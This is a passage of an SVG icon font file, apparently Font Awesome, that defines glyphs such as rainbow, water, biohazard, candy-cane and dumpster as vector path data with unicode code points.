c-17.6006 0 -31.9004 14.2998 -31.9004 32l0.200195 160l-0.200195 95.9004c0 17.0996 6.7002 33.1992 18.7002 45.2998c12.0996 12.0996 28.2002 18.7998 45.2998 18.7998h18.7002c17 0 33.0996 -6.59961 45.2002 -18.7002l45.1992 -45.2998h50.9004zM64 320
c-26.5 0 -48 21.5 -48 48s21.5 48 48 48s48 -21.5 48 -48s-21.5 -48 -48 -48zM288 416v32h192v-416c0 -17.7002 -14.2998 -32 -32 -32s-32 14.2998 -32 32c0 -17.7002 -14.2998 -32 -32 -32c-17.0996 0 -30.7998 13.5 -31.7002 30.4004
c-4.2998 -21.3008 -17.0996 -30.4004 -32.2998 -30.4004c-18.4004 0 -35.7002 16.7002 -31.4004 38.2998l30.9004 154.601zM192 416c0 17.7002 14.2998 32 32 32h32v-192h-64v160zM544 448c17.7002 0 32 -14.2998 32 -32v-464c0 -8.7998 -7.2002 -16 -16 -16h-32
c-8.7998 0 -16 7.2002 -16 16v496h32z" />
    <glyph glyph-name="poo-storm" unicode="&#xf75a;" horiz-adv-x="447" 
d="M308 112c9.2002 0 15 -10 10.4004 -18l-88 -152c-2.2002 -3.7998 -6.2002 -6 -10.4004 -6c-7.7002 0 -13.5 7.2002 -11.7002 14.7998l23 97.2002h-59.2998c-7.2998 0 -12.9004 6.40039 -11.9004 13.5996l16 120c0.800781 5.90039 5.90039 10.4004 11.9004 10.4004h68
c7.90039 0 13.5996 -7.5 11.5996 -15.0996l-17.2998 -64.9004h57.7002zM374.4 223.3c41 -3.2998 73.5996 -37.5 73.5 -79.2998c0 -44 -36 -80 -80 -80h-30l8.09961 14c7.7998 13.5 7.7998 30.4004 0 44s-22.4004 22 -38.0996 22h-16l6.59961 24.7002
c3.59961 13.2998 0.799805 27.2002 -7.59961 38.0996c-8.40039 10.9004 -21.1006 17.2002 -34.9004 17.2002h-68c-22 0 -40.7002 -16.4004 -43.7002 -38.2002l-16 -120c0 -0.599609 0.100586 -1.2002 0 -1.7998h-48.2998c-44 0 -80 36 -80 80
c0 41.7998 32.5996 76 73.5996 79.2998c-5.89941 9.60059 -9.59961 20.6006 -9.59961 32.7002c0 35.2998 28.7002 64 64 64h16c44.2002 0 80 35.7998 80 80c0 17.4004 -5.7002 33.4004 -15.0996 46.5c4.89941 0.799805 9.89941 1.5 15.0996 1.5c53 0 96 -43 96 -96
c0 -11.2998 -2.2998 -21.9004 -5.90039 -32h5.90039c35.2998 0 64 -28.7002 64 -64c0 -12.0996 -3.7002 -23.0996 -9.59961 -32.7002z" />
    <glyph glyph-name="rainbow" unicode="&#xf75b;" horiz-adv-x="576" 
d="M268.3 415.3c167.7 11.2998 307.7 -122 307.7 -287.3v-144c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v136.2c0 113.8 -81.5996 215.399 -194.5 229.899c-136.6 17.6006 -253.5 -88.8994 -253.5 -222.1v-144c0 -8.7998 -7.2002 -16 -16 -16h-32
c-8.7998 0 -16 7.2002 -16 16v133.8c0 153.3 115.4 287.3 268.3 297.5zM262.7 318.4c117.1 15 217.3 -76.2002 217.3 -190.4v-144c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v138.3c0 66.9004 -48.7002 126.601 -115.2 133.101
c-76.2998 7.39941 -140.8 -52.6006 -140.8 -127.4v-144c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v137.3c0 97.6006 70 184.7 166.7 197.101zM268.9 222.1c61.2998 11.9004 115.1 -34.8994 115.1 -94.0996v-144c0 -8.7998 -7.2002 -16 -16 -16h-32
c-8.7998 0 -16 7.2002 -16 16v144c0 17.5996 -14.2998 32 -32 32s-32 -14.4004 -32 -32v-144c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v140.2c0 46.3994 31.2998 89 76.9004 97.8994z" />
    <glyph glyph-name="republican" unicode="&#xf75e;" horiz-adv-x="640" 
d="M544 256v-64h-544v64c0 88.4004 71.5996 160 160 160h224c88.4004 0 160 -71.5996 160 -160zM176.3 277.6c3.5 3.5 1.60059 9.5 -3.39941 10.2002l-27.4004 4l-12.2002 24.7998c-2.09961 4.40039 -8.5 4.5 -10.7002 0l-12.1992 -24.7998l-27.4004 -4
c-4.90039 -0.700195 -6.90039 -6.7002 -3.2998 -10.2002l19.7998 -19.2998l-4.7002 -27.2998c-0.799805 -4.90039 4.40039 -8.59961 8.7002 -6.2998l24.5 12.8994l24.5 -12.8994c4.40039 -2.2998 9.5 1.39941 8.7002 6.2998l-4.7002 27.2998zM320.3 277.6
c3.5 3.5 1.60059 9.5 -3.39941 10.2002l-27.4004 4l-12.2002 24.7998c-2.09961 4.40039 -8.5 4.5 -10.7002 0l-12.1992 -24.7998l-27.4004 -4c-4.90039 -0.700195 -6.90039 -6.7002 -3.2998 -10.2002l19.7998 -19.2998l-4.7002 -27.2998
c-0.799805 -4.90039 4.40039 -8.59961 8.7002 -6.2998l24.5 12.8994l24.5 -12.8994c4.40039 -2.2998 9.5 1.39941 8.7002 6.2998l-4.7002 27.2998zM464.3 277.6c3.5 3.5 1.60059 9.5 -3.39941 10.2002l-27.4004 4l-12.2002 24.7998c-2.09961 4.40039 -8.5 4.5 -10.7002 0
l-12.1992 -24.7998l-27.4004 -4c-4.90039 -0.700195 -6.90039 -6.7002 -3.2998 -10.2002l19.7998 -19.2998l-4.7002 -27.2998c-0.799805 -4.90039 4.40039 -8.59961 8.7002 -6.2998l24.5 12.8994l24.5 -12.8994c4.40039 -2.2998 9.5 1.39941 8.7002 6.2998l-4.7002 27.2998z
M624 128c8.7998 0 16 -7.2002 16 -16v-64c0 -46.9004 -40.5996 -84.5 -88.4004 -79.5996c-41.5996 4.19922 -71.5996 42.5 -71.5996 84.2998v43.2998h-32v-112c0 -8.7998 -7.2002 -16 -16 -16h-96c-8.7998 0 -16 7.2002 -16 16v80h-192v-80c0 -8.7998 -7.2002 -16 -16 -16
h-96c-8.7998 0 -16 7.2002 -16 16v176h544v-112c0 -8.7998 7.2002 -16 16 -16s16 7.2002 16 16v64c0 8.7998 7.2002 16 16 16h32z" />
    <glyph glyph-name="smog" unicode="&#xf75f;" horiz-adv-x="640" 
d="M624 80c8.7998 0 16 -7.2002 16 -16v-16c0 -8.7998 -7.2002 -16 -16 -16h-544c-8.7998 0 -16 7.2002 -16 16v16c0 8.7998 7.2002 16 16 16h544zM144 -16c8.7998 0 16 -7.2002 16 -16v-16c0 -8.7998 -7.2002 -16 -16 -16h-128c-8.7998 0 -16 7.2002 -16 16v16
c0 8.7998 7.2002 16 16 16h128zM560 -16c8.7998 0 16 -7.2002 16 -16v-16c0 -8.7998 -7.2002 -16 -16 -16h-336c-8.7998 0 -16 7.2002 -16 16v16c0 8.7998 7.2002 16 16 16h336zM144 160c-79.5 0 -144 64.5 -144 144s64.5 144 144 144c41 0 77.7998 -17.2998 104 -44.7998
c26.2002 27.5 63 44.7998 104 44.7998c54.7998 0 102 -31 126.3 -76.0996c15 7.5 31.7002 12.0996 49.7002 12.0996c61.9004 0 112 -50.0996 112 -112s-50.0996 -112 -112 -112h-60.0996c-22.6006 -19.7002 -51.6006 -32 -83.9004 -32s-61.4004 12.2998 -83.9004 32h-156.1z
" />
    <glyph glyph-name="temperature-high" unicode="&#xf769;" 
d="M416 448c52.9004 0 96 -43.0996 96 -96s-43.0996 -96 -96 -96s-96 43.0996 -96 96s43.0996 96 96 96zM416 320c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32zM256 336v-166.5c19.7002 -24.5996 32 -55.5 32 -89.5
c0 -79.5 -64.5 -144 -144 -144s-144 64.5 -144 144c0 34 12.2998 64.7998 32 89.5v166.5c0 61.9004 50.0996 112 112 112s112 -50.0996 112 -112zM144 0c44.0996 0 80 35.9004 80 80c0 25.5 -12.2002 49 -32 63.7998v192.2c0 26.5 -21.5 48 -48 48s-48 -21.5 -48 -48v-192.2
c-19.7998 -14.8994 -32 -38.2998 -32 -63.7998c0 -44.0996 35.9004 -80 80 -80zM160 125.1c18.5996 -6.59961 32 -24.1992 32 -45.0996c0 -26.5 -21.5 -48 -48 -48s-48 21.5 -48 48c0 20.9004 13.4004 38.5 32 45.0996v210.9c0 8.7998 7.2002 16 16 16s16 -7.2002 16 -16
v-210.9z" />
    <glyph glyph-name="temperature-low" unicode="&#xf76b;" 
d="M416 448c52.9004 0 96 -43.0996 96 -96s-43.0996 -96 -96 -96s-96 43.0996 -96 96s43.0996 96 96 96zM416 320c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32zM256 336v-166.5c19.7002 -24.5996 32 -55.5 32 -89.5
c0 -79.5 -64.5 -144 -144 -144s-144 64.5 -144 144c0 34 12.2998 64.7998 32 89.5v166.5c0 61.9004 50.0996 112 112 112s112 -50.0996 112 -112zM144 0c44.0996 0 80 35.9004 80 80c0 25.5 -12.2002 49 -32 63.7998v192.2c0 26.5 -21.5 48 -48 48s-48 -21.5 -48 -48v-192.2
c-19.7998 -14.8994 -32 -38.2998 -32 -63.7998c0 -44.0996 35.9004 -80 80 -80zM160 125.1c18.5996 -6.59961 32 -24.1992 32 -45.0996c0 -26.5 -21.5 -48 -48 -48s-48 21.5 -48 48c0 20.9004 13.4004 38.5 32 45.0996v18.9004c0 8.7998 7.2002 16 16 16s16 -7.2002 16 -16
v-18.9004z" />
    <glyph glyph-name="vote-yea" unicode="&#xf772;" horiz-adv-x="640" 
d="M608 128c17.7002 0 32 -14.2998 32 -32v-96c0 -17.7002 -14.2998 -32 -32 -32h-576c-17.7002 0 -32 14.2998 -32 32v96c0 17.7002 14.2998 32 32 32h64v-64h-22.4004c-5.2998 0 -9.59961 -3.59961 -9.59961 -8v-16c0 -4.40039 4.2998 -8 9.59961 -8h492.801
c5.2998 0 9.59961 3.59961 9.59961 8v16c0 4.40039 -4.2998 8 -9.59961 8h-22.4004v64h64zM512 64h-384v319.7c0 17.7998 14.5 32.2998 32.4004 32.2998h319.3c17.7998 0 32.2998 -14.4004 32.2998 -32.2998v-319.7zM211.2 246c-4.2002 -4.2002 -4.2998 -11 0 -15.2002
l74.0996 -74.7002c4.2002 -4.2998 11 -4.2998 15.2002 -0.0996094l128.3 127.2c4.2998 4.2002 4.2998 11 0.100586 15.2002l-25.3008 25.5c-4.19922 4.2998 -11 4.2998 -15.1992 0.0996094l-95.2002 -94.4004l-41.2998 41.6006
c-4.2002 4.2998 -11 4.2998 -15.2002 0.0996094z" />
    <glyph glyph-name="water" unicode="&#xf773;" horiz-adv-x="575" 
d="M562.1 64.0996c8.10059 -0.899414 13.9004 -8.2998 13.8008 -16.2998v-31.5996c0 -9.10059 -7.60059 -16.7998 -16.7002 -16c-28.2002 2.5 -55.7998 11.5996 -79.1006 25.7998c-55 -34.0996 -135.5 -34.5996 -192 0c-55 -34.0996 -135.5 -34.5996 -192 0
c-23.2998 -14.5 -50.5996 -23.4004 -79.3994 -25.9004c-9.10059 -0.799805 -16.7002 6.90039 -16.7002 16v32.2002c0 7.90039 5.7002 14.9004 13.5996 15.7002c21.7002 2.2998 42.2002 10.2002 57.7002 22.4004c13.7998 10.8994 33.6006 13.1992 47.1006 2
c38.2998 -31.7002 107.199 -31.8008 145.199 -1.7002c13.7002 10.8994 33.2002 13 46.7002 1.7998c38.5 -31.9004 107.8 -31.9004 145.7 -1.5c14 11.2998 34.0996 11.0996 48.2002 0c15.7998 -12.4004 36.3994 -20.5 57.8994 -22.9004zM562.1 208.1
c8.10059 -0.899414 13.9004 -8.2998 13.8008 -16.2998v-31.5996c0 -9.10059 -7.60059 -16.7998 -16.7002 -16c-28.2002 2.5 -55.7998 11.5996 -79.1006 25.7998c-55 -34.0996 -135.5 -34.5996 -192 0c-55 -34.0996 -135.5 -34.5996 -192 0
c-23.2998 -14.5 -50.5996 -23.4004 -79.3994 -25.9004c-9.10059 -0.799805 -16.7002 6.90039 -16.7002 16v32.2002c0 7.90039 5.7002 14.9004 13.5996 15.7002c21.7002 2.2998 42.2002 10.2002 57.7002 22.4004c13.7998 10.8994 33.6006 13.1992 47.1006 2
c38.2998 -31.7002 107.199 -31.8008 145.199 -1.7002c13.7002 10.8994 33.2002 13 46.7002 1.7998c38.5 -31.9004 107.8 -31.9004 145.7 -1.5c14 11.2998 34.0996 11.0996 48.2002 0c15.7998 -12.4004 36.3994 -20.5 57.8994 -22.9004zM562.1 352.1
c8.10059 -0.899414 13.9004 -8.2998 13.8008 -16.2998v-31.5996c0 -9.10059 -7.60059 -16.7998 -16.7002 -16c-28.2002 2.5 -55.7998 11.5996 -79.1006 25.7998c-55 -34.0996 -135.5 -34.5996 -192 0c-55 -34.0996 -135.5 -34.5996 -192 0
c-23.2998 -14.5 -50.5996 -23.4004 -79.3994 -25.9004c-9.10059 -0.799805 -16.7002 6.90039 -16.7002 16v32.2002c0 7.90039 5.7002 14.9004 13.5996 15.7002c21.7002 2.2998 42.2002 10.2002 57.7002 22.4004c13.7998 10.8994 33.6006 13.1992 47.1006 2
c38.2998 -31.7002 107.199 -31.8008 145.199 -1.7002c13.7002 10.8994 33.2002 13 46.7002 1.7998c38.5 -31.9004 107.8 -31.9004 145.7 -1.5c14 11.2998 34.0996 11.0996 48.2002 0c15.7998 -12.4004 36.3994 -20.4004 57.8994 -22.9004z" />
    <glyph glyph-name="baby" unicode="&#xf77c;" horiz-adv-x="384" 
d="M192 288c-44.2002 0 -80 35.7998 -80 80s35.7998 80 80 80s80 -35.7998 80 -80s-35.7998 -80 -80 -80zM138.6 39.2002l29.4004 -39.2002c13.2002 -17.7002 9.7002 -42.7998 -8 -56c-7.2002 -5.40039 -15.7002 -8 -24 -8c-12.0996 0 -24.0996 5.5 -32 16l-48 64
c-10.9004 14.5996 -10.5996 34.7998 0.799805 49l45.9004 57.4004l61.5 -51.2002zM281.3 122.4l45.9004 -57.4004c11.3994 -14.2002 11.7002 -34.4004 0.799805 -49l-48 -64c-7.7998 -10.5 -19.7998 -16 -32 -16c-8.40039 0 -16.7998 2.59961 -24 8
c-17.7002 13.2002 -21.2002 38.2998 -8 56l29.4004 39.2002l-25.6006 32zM376.7 303c12.7002 -18.0996 8.39941 -43 -9.7002 -55.7998l-40.5996 -28.5c-17 -11.9004 -35.4004 -20.9004 -54.4004 -27.9004v-30.7998h-160v30.9004c-19 7 -37.4004 16 -54.4004 27.8994
l-40.5996 28.5c-18 12.7002 -22.4004 37.6006 -9.7002 55.7002c12.7002 18 37.6006 22.4004 55.7002 9.7002l40.5996 -28.4004c52.6006 -37 124.101 -37 176.801 0l40.5996 28.5c18.0996 12.6006 43 8.2998 55.7002 -9.7998z" />
    <glyph glyph-name="baby-carriage" unicode="&#xf77d;" 
d="M144.8 431l111.2 -175h-256c0 74 35.2998 140.1 90.7998 184.4c16.7998 13.3994 42.7002 8.39941 54 -9.40039zM496 352c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-48v-64c0 -50.5996 -23 -96.4004 -60.2998 -130.7
c34.5996 -8.89941 60.2998 -40 60.2998 -77.2998c0 -44.2002 -35.7998 -80 -80 -80s-80 35.7998 -80 80c0 8.90039 1.7002 17.2002 4.40039 25.2002c-21.5 -5.90039 -44.6006 -9.2002 -68.4004 -9.2002s-46.7998 3.2998 -68.4004 9.2002
c2.60059 -8 4.40039 -16.2998 4.40039 -25.2002c0 -44.2002 -35.7998 -80 -80 -80s-80 35.7998 -80 80c0 37.2998 25.7002 68.4004 60.2998 77.2998c-37.2998 34.2998 -60.2998 80.1006 -60.2998 130.7h384v64c0 35.2998 28.7002 64 64 64h48zM80 -16
c17.5996 0 32 14.4004 32 32s-14.4004 32 -32 32s-32 -14.4004 -32 -32s14.4004 -32 32 -32zM400 16c0 17.5996 -14.4004 32 -32 32s-32 -14.4004 -32 -32s14.4004 -32 32 -32s32 14.4004 32 32z" />
    <glyph glyph-name="biohazard" unicode="&#xf780;" horiz-adv-x="575" 
d="M287.9 336c-18.5 0 -36 -3.7998 -52.5 -9.5c-13.3008 10.2998 -23.6006 24.2998 -29.5 40.7002c25.1992 10.8994 53 16.8994 82.0996 16.8994c29.2002 0 57 -6.09961 82.2002 -17c-5.90039 -16.3994 -16.2002 -30.3994 -29.5 -40.6992
c-16.6006 5.7998 -34.2002 9.59961 -52.7998 9.59961zM163.6 9.2998c-47.5 35.5 -79.1992 90.7002 -83.2998 153.5c7.2998 2.10059 14.9004 3.10059 22.5 3.10059c9.2002 0 17.9004 -1.80078 26.4004 -4.60059c4.09961 -44.2998 26 -83.2002 58.8994 -109.6
c-4.09961 -16 -12.5 -30.6006 -24.5 -42.4004zM387.8 51.9004c32.7002 26.3994 54.6006 65.0996 58.7002 109.3c8.59961 2.7998 17.4004 4.7002 26.5996 4.7002c7.5 0 15 -1 22.2002 -3c-3.89941 -62.8008 -35.5996 -118 -83 -153.5c-12 11.7998 -20.3994 26.5 -24.5 42.5z
M501.3 256.9c34.6006 -20.4004 61 -53.3008 74.1006 -92.4004c1.2998 -3.7002 -0.200195 -7.7998 -3.5 -9.7998c-3.30078 -2 -7.5 -1.2998 -10 1.59961c-9.40039 10.7998 -19 19 -29.2002 25.1006c-57.2998 33.8994 -130.8 13.6992 -163.9 -45
c-33.0996 -58.7002 -13.3994 -134 43.9004 -167.9c10.2002 -6.09961 21.8994 -10.5 35.7998 -13.4004c3.7998 -0.799805 6.40039 -4.19922 6.40039 -8.09961c-0.100586 -4 -2.7002 -7.2998 -6.5 -8c-39.7002 -7.7998 -80.6006 -0.799805 -115.2 19.7002
c-18 10.5996 -32.9004 24.5 -45.2998 40.0996c-12.4004 -15.5996 -27.3008 -29.5 -45.3008 -40.0996c-34.5996 -20.5 -75.5 -27.5 -115.199 -19.7002c-3.80078 0.700195 -6.40039 4 -6.5 8c0 3.90039 2.69922 7.2998 6.39941 8.09961
c13.7998 3 25.6006 7.30078 35.7998 13.4004c57.3008 33.9004 77 109.2 43.9004 167.9c-33.0996 58.6992 -106.6 78.8994 -163.9 45c-10.1992 -6 -19.7998 -14.3008 -29.1992 -25.1006c-2.5 -2.89941 -6.7002 -3.59961 -10 -1.59961
c-3.30078 2.09961 -4.80078 6.09961 -3.5 9.7998c13.2998 39.0996 39.6992 71.9004 74.2998 92.4004c17.5996 10.3994 36.3994 16.5996 55.2998 19.8994c-6.09961 17.7002 -10 36.4004 -10 56.2002c0 41 14.5996 80.7998 41 112.2c2.5 3 6.59961 3.7002 10 1.7998
c3.2998 -1.90039 4.7998 -6 3.59961 -9.7002c-4.39941 -13.7998 -6.59961 -26.3994 -6.59961 -38.5c0 -67.7998 53.7998 -122.899 120 -122.899s120 55.0996 120 122.899c0 12.2002 -2.09961 24.7002 -6.59961 38.5c-1.2002 3.7002 0.299805 7.7998 3.59961 9.7002
c3.40039 1.90039 7.5 1.2002 10 -1.7998c26.5 -31.4004 41 -71.2002 41 -112.2c0 -19.7998 -4 -38.5 -10 -56.2002c19 -3.2998 37.7002 -9.5 55.2998 -19.8994zM287.9 127.9c26.5 0 48 21.5 48 48s-21.5 48 -48 48s-48 -21.5 -48 -48s21.5 -48 48 -48z" />
    <glyph glyph-name="blog" unicode="&#xf781;" horiz-adv-x="511" 
d="M172.2 221.2c75.5 -15 129.899 -89.2998 112.5 -172.2c-11.4004 -54.2998 -55.2998 -98.2998 -109.7 -109.7c-92.9004 -19.5 -175 51.2002 -175 140.7v248c0 13.2998 10.7002 24 24 24h48c13.2998 0 24 -10.7002 24 -24v-248c0 -26.5 21.5 -48 48 -48s48 21.5 48 48
c0 20.5996 -13.0996 38.2002 -31.2998 45c-9.60059 3.59961 -16.7002 11.7998 -16.7002 22v50.4004c0 14.8994 13.5996 26.6992 28.2002 23.7998zM209 448c163.2 -8.59961 294.4 -139.8 302.9 -303c0.5 -9.2002 -6.80078 -17 -16 -17h-32.1006
c-8.39941 0 -15.3994 6.59961 -15.8994 15c-7.5 129.5 -111.5 234.5 -240.9 241.5c-8.40039 0.400391 -15 7.40039 -15 15.9004v31.5996c0 9.2002 7.7998 16.5 17 16zM209.3 352c110.101 -8.5 198.2 -96.5996 206.601 -206.7
c0.699219 -9.2998 -6.80078 -17.2998 -16.1006 -17.2998h-32.2002c-8.2998 0 -15.0996 6.40039 -15.8994 14.7002c-6.90039 77 -68.1006 138.899 -144.9 145.2c-8.2998 0.599609 -14.7998 7.5 -14.7998 15.8994v32.1006c0 9.39941 8 16.7998 17.2998 16.0996z" />
    <glyph glyph-name="calendar-day" unicode="&#xf783;" horiz-adv-x="448" 
d="M0 -16v272h448v-272c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48zM64 176v-96c0 -8.7998 7.2002 -16 16 -16h96c8.7998 0 16 7.2002 16 16v96c0 8.7998 -7.2002 16 -16 16h-96c-8.7998 0 -16 -7.2002 -16 -16zM400 384c26.5 0 48 -21.5 48 -48v-48h-448v48
c0 26.5 21.5 48 48 48h48v48c0 8.7998 7.2002 16 16 16h32c8.7998 0 16 -7.2002 16 -16v-48h128v48c0 8.7998 7.2002 16 16 16h32c8.7998 0 16 -7.2002 16 -16v-48h48z" />
    <glyph glyph-name="calendar-week" unicode="&#xf784;" horiz-adv-x="448" 
d="M0 -16v272h448v-272c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48zM64 176v-64c0 -8.7998 7.2002 -16 16 -16h288c8.7998 0 16 7.2002 16 16v64c0 8.7998 -7.2002 16 -16 16h-288c-8.7998 0 -16 -7.2002 -16 -16zM400 384c26.5 0 48 -21.5 48 -48v-48h-448
v48c0 26.5 21.5 48 48 48h48v48c0 8.7998 7.2002 16 16 16h32c8.7998 0 16 -7.2002 16 -16v-48h128v48c0 8.7998 7.2002 16 16 16h32c8.7998 0 16 -7.2002 16 -16v-48h48z" />
    <glyph glyph-name="candy-cane" unicode="&#xf786;" 
d="M497.5 356c35.7002 -75.5 2.7998 -166.1 -68.9004 -209l-347.3 -206.5c-5.2002 -3 -10.7998 -4.5 -16.3994 -4.5c-10.9004 0 -21.5 5.59961 -27.5 15.5996l-32.8008 54.9004c-9.09961 15.2002 -4.19922 34.7998 11 43.9004l353.601 210.1
c15.0996 9.09961 20.0996 28.7998 11 43.9004c-6 10 -16.6006 15.5996 -27.5 15.5996c-5.60059 0 -11.2998 -1.40039 -16.4004 -4.5l-27.5 -16.4004c-5.2002 -3 -10.7998 -4.5 -16.3994 -4.5c-10.9004 0 -21.5 5.60059 -27.5 15.6006l-32.8008 54.8994
c-9.09961 15.2002 -4.19922 34.8008 11 43.9004l27.5 16.4004c25.6006 15.2998 53.9004 22.5996 81.8008 22.5996c59.3994 0 117.199 -33.0996 145.1 -92zM319.8 343c8.5 5.09961 18.1006 7.59961 27.9004 8.40039l-20.6006 61.7998
c-10.5 -2.10059 -20.5996 -5.5 -30.2998 -10.2002l20.5 -61.5zM145.9 16.2002l30.7998 18.2998l-60.5 38.5l-30.7998 -18.2998zM253.4 80.0996l30.7998 18.3008l-60.5 38.5l-30.7998 -18.3008zM364.3 146l30.7998 18.2998l-60.5 38.5l-30.7998 -18.2998zM384.7 343.3
c9.2002 -5.39941 17.2002 -13 22.8994 -22.2998l45.7002 45.7002c-6.59961 8.5 -14.2002 16.0996 -22.5996 22.5996zM466.8 235.5c4.60059 9.7998 8 20 10.1006 30.4004l-60.4004 20.0996c-0.0996094 -4.5 -0.700195 -9.09961 -1.7998 -13.5996
c-1.60059 -6.2002 -4.2002 -11.8008 -7.40039 -17.1006z" />
    <glyph glyph-name="carrot" unicode="&#xf787;" 
d="M298.2 291.4c61.7002 -30.1006 87.2998 -104.5 57.2002 -166.2c-12.6006 -25.7998 -33.1006 -45.4004 -57.1006 -57.1006l-102 -49.7998l-57 57c-6.2002 6.2002 -16.2998 6.2002 -22.5996 0s-6.2998 -16.3994 0 -22.5996l49.2002 -49.2002l-133.601 -65.2002
c-11.0996 -5.39941 -24.5996 -0.799805 -30 10.2998c-3.09961 6.40039 -2.89941 13.7002 0 19.7002l128.101 262.7l50.1992 -50.2002c3.10059 -3.09961 7.2002 -4.7002 11.3008 -4.7002c4.09961 0 8.19922 1.60059 11.2998 4.7002c6.2998 6.2002 6.2998 16.2998 0 22.6006
l-55.2002 55.1992c35.7002 43.3008 97.5 58.5 150.2 32.8008zM390.3 326.3c40.7002 19.5 88.7998 9.40039 121.7 -30.2998c-41.5996 -50.2998 -107.5 -52.5 -151.9 -7.90039l-8 8c-44.5996 44.4004 -42.3994 110.2 7.90039 151.9
c39.7002 -32.9004 49.7998 -81 30.2998 -121.7z" />
    <glyph glyph-name="cash-register" unicode="&#xf788;" 
d="M511.1 69.2002c0.600586 -3.5 0.900391 -7 0.800781 -10.5v-90.7002c0 -17.7002 -14.3008 -32 -32 -32h-448c-17.7002 0 -32 14.2998 -32 32v90.7998c0 3.5 0.299805 7 0.899414 10.5l26.7002 160c2.59961 15.4004 16 26.7002 31.5996 26.7002h84.9004v64h-96
c-8.7998 0 -16 7.2002 -16 16v96c0 8.7998 7.2002 16 16 16h256c8.7998 0 16 -7.2002 16 -16v-96.0996c0 -8.80078 -7.2002 -16 -16 -16h-96v-64h244.8c15.7002 0 29 -11.3008 31.6006 -26.7002zM280 200v-16c0 -8.7998 7.2002 -16 16 -16h16c8.7998 0 16 7.2002 16 16v16
c0 8.7998 -7.2002 16 -16 16h-16c-8.7998 0 -16 -7.2002 -16 -16zM248 136c-8.7998 0 -16 -7.2002 -16 -16v-16c0 -8.7998 7.2002 -16 16 -16h16c8.7998 0 16 7.2002 16 16v16c0 8.7998 -7.2002 16 -16 16h-16zM216 216h-16c-8.7998 0 -16 -7.2002 -16 -16v-16
c0 -8.7998 7.2002 -16 16 -16h16c8.7998 0 16 7.2002 16 16v16c0 8.7998 -7.2002 16 -16 16zM80 368h192v32h-192v-32zM120 168c8.7998 0 16 7.2002 16 16v16c0 8.7998 -7.2002 16 -16 16h-16c-8.7998 0 -16 -7.2002 -16 -16v-16c0 -8.7998 7.2002 -16 16 -16h16zM136 104
c0 -8.7998 7.2002 -16 16 -16h16c8.7998 0 16 7.2002 16 16v16c0 8.7998 -7.2002 16 -16 16h-16c-8.7998 0 -16 -7.2002 -16 -16v-16zM352 -8v16c0 4.40039 -3.59961 8 -8 8h-176c-4.40039 0 -8 -3.59961 -8 -8v-16c0 -4.40039 3.59961 -8 8 -8h176c4.40039 0 8 3.59961 8 8
zM376 104v16c0 8.7998 -7.2002 16 -16 16h-16c-8.7998 0 -16 -7.2002 -16 -16v-16c0 -8.7998 7.2002 -16 16 -16h16c8.7998 0 16 7.2002 16 16zM424 184v16c0 8.7998 -7.2002 16 -16 16h-16c-8.7998 0 -16 -7.2002 -16 -16v-16c0 -8.7998 7.2002 -16 16 -16h16
c8.7998 0 16 7.2002 16 16z" />
    <glyph glyph-name="compress-arrows-alt" unicode="&#xf78c;" 
d="M200 160c13.2998 0 24 -10.7002 24 -24v-112c0 -21.4004 -25.7998 -32.0996 -40.9004 -17l-31.0996 33l-99.2998 -99.2998c-6.2002 -6.2002 -16.4004 -6.2002 -22.6006 0l-25.3994 25.3994c-6.2002 6.2002 -6.2002 16.4004 0 22.6006l99.2002 99.2998l-32.9004 31
c-15.0996 15.2002 -4.40039 41 17 41h112zM312 224c-13.2998 0 -24 10.7002 -24 24v112c0 21.4004 25.7998 32.0996 40.9004 17l31.0996 -33l99.2998 99.2998c6.2002 6.2002 16.4004 6.2002 22.6006 0l25.3994 -25.3994c6.2002 -6.2002 6.2002 -16.4004 0 -22.6006
l-99.2998 -99.2998l33 -31c15.0996 -15.0996 4.40039 -41 -17 -41h-112zM408 88l99.2998 -99.4004c6.2002 -6.19922 6.2002 -16.3994 0 -22.5996l-25.3994 -25.4004c-6.2002 -6.19922 -16.4004 -6.19922 -22.6006 0l-99.2998 99.3008l-31 -32.9004
c-15.0996 -15.0996 -41 -4.40039 -41 17v112c0 13.2998 10.7002 24 24 24h112c21.4004 0 32.0996 -25.7998 17 -40.9004zM183 376.9c15.0996 15.0996 41 4.39941 41 -16.9004v-112c0 -13.2998 -10.7002 -24 -24 -24h-112c-21.4004 0 -32.0996 25.7998 -17 40.9004
l33 31.0996l-99.2998 99.2998c-6.2002 6.2002 -6.2002 16.4004 0 22.6006l25.3994 25.3994c6.2002 6.2002 16.4004 6.2002 22.6006 0l99.2998 -99.2998z" />
    <glyph glyph-name="dumpster" unicode="&#xf793;" horiz-adv-x="576" 
d="M560 288h-97.2998l-25.6006 128h98.9004c7.2998 0 13.7002 -5 15.5 -12.0996l24 -96c2.5 -10.1006 -5.09961 -19.9004 -15.5 -19.9004zM272 416v-128h-126.1l25.5996 128h100.5zM404.5 416l25.5996 -128h-126.1v128h100.5zM16 288c-10.4004 0 -18 9.7998 -15.5 19.9004
l24 96c1.7998 7.09961 8.2002 12.0996 15.5 12.0996h98.9004l-25.6006 -128h-97.2998zM560 224c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-28l-20 -160v-16c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v16h-320v-16
c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v16l-20 160h-28c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h20l-4 32h512l-4 -32h20z" />
    <glyph glyph-name="dumpster-fire" unicode="&#xf794;" horiz-adv-x="639" 
